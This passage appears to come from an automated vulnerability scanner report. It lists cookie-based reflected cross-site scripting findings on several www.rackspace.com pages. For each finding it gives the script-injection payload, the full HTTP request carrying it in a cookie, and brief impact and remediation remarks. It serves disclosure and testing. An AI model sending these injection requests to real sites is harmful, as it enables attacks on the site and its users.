Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81ed21"><script>alert(1)</script>8032cd80c6d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12910"%3balert(1)//1f149810279 was submitted in the chatslider cookie. This input was echoed as 12910";alert(1)//1f149810279 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/configurations.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D12910"%3balert(1)//1f149810279; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae75c"><script>alert(1)</script>38366e2ccd0 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/configurations.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dae75c"><script>alert(1)</script>38366e2ccd0; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c97"><script>alert(1)</script>5a98528f5be was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b6c97"><script>alert(1)</script>5a98528f5be; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33404"%3balert(1)//57e2c40e1d4 was submitted in the IS_UASrackuid cookie. This input was echoed as 33404";alert(1)//57e2c40e1d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f833404"%3balert(1)//57e2c40e1d4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f03b"%3balert(1)//03c1859654d was submitted in the chatslider cookie. This input was echoed as 2f03b";alert(1)//03c1859654d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2f03b"%3balert(1)//03c1859654d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f480"><script>alert(1)</script>e9535403bb1 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4f480"><script>alert(1)</script>e9535403bb1; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51cf"><script>alert(1)</script>340a81d4041 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f51cf"><script>alert(1)</script>340a81d4041; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 820b3"%3balert(1)//e86c1e3065f was submitted in the IS_UASrackuid cookie. This input was echoed as 820b3";alert(1)//e86c1e3065f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8820b3"%3balert(1)//e86c1e3065f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14541"%3balert(1)//13fe87add69 was submitted in the chatslider cookie. This input was echoed as 14541";alert(1)//13fe87add69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D14541"%3balert(1)//13fe87add69; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5095"><script>alert(1)</script>4fe2686fc8e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc5095"><script>alert(1)</script>4fe2686fc8e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ec18"><script>alert(1)</script>702b54d400a was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f84ec18"><script>alert(1)</script>702b54d400a; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0d33"><script>alert(1)</script>614c3dc012b was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d0d33"><script>alert(1)</script>614c3dc012b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4b1"%3balert(1)//440e9be975d was submitted in the IS_UASrackuid cookie. This input was echoed as bb4b1";alert(1)//440e9be975d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bb4b1"%3balert(1)//440e9be975d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; 